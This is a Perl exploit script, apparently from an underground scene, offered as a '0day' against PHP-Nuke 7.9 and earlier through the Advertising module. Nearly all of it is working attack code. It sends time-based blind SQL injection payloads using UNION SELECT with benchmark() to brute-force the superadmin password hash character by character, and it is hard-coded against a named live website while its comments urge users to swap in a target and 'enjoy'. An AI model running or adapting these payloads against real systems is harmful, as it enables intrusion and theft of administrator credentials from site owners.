#!/usr/bin/perl

#0day exploit for PHP-nuke <=7.9
#Raijin exploit
#Funziona con il modulo Advertising attivato
#Modificare la variabile HOST e divertitevi
#modify the variable HOST and enjoy

use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;


my $host = "http://www.creativetech.it/modules.php?name=Advertising";

my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(POST => $host);

my $post;
my $inizio;
my $risposta;
my $fine;
my $tempodefault;
my $tempo;
my $i;
my $j;
my $hash;
my @array;

@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);


$post="login=a&pass=a&op=client_valid";
$tempodefault=richiesta($post);
$hash="";


#QUERY RISULTANTE

#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`,1,1))=112),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*


for ($i=1;$i<33;$i++)
      {
      for ($j=0;$j<16;$j++)
      {
              $post="login=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i . ",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*&pass=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i . ",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*&op=client_valid";
              $tempo=richiesta($post);
              aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
              if($tempo>10)
              {
                      $tempo=richiesta($post);
                      aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
                      if($tempo>10)
                      {
                              $hash .=chr($array[$j]);
                              aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
                              $j=200;
                      }
              }


      }
      if($i==1)
      {
              if($hash eq "")
              {
                      $i=200;
                      print "Attacco Fallito Sito Fixato\n";
              }
      }
}


      print "Attacco Terminato\n\n";

system("pause");


sub richiesta{
      $post=$_[0];
      $metodo->content_type('application/x-www-form-urlencoded');
        $metodo->content($post);
      $inizio=Time::HiRes::time();
      $risposta=$useragent->request($metodo);
      $risposta->is_success or die "$host : ",$risposta->message,"\n";
      $fine=Time::HiRes::time();
      $tempo=$fine-$inizio;
      return $tempo
}

sub aggiorna{
      system("cls");
      @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
      print "Exploit Php-Nuke <=7.9 By El Pocho87\n";
      print "rdn on IRCNET\n\n";
      print "Sito Vittima : " . $_[0] . "\n";
      print "Tempo Default : " . $_[1] . " secondi\n";
      print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n";
      print "Bruteforcing n carattere Hash : " . $_[5] . "\n";
      print "Tempo sql : " . $_[4] . " secondi\n";
      print "Hash : " . $_[3] . "\n";
}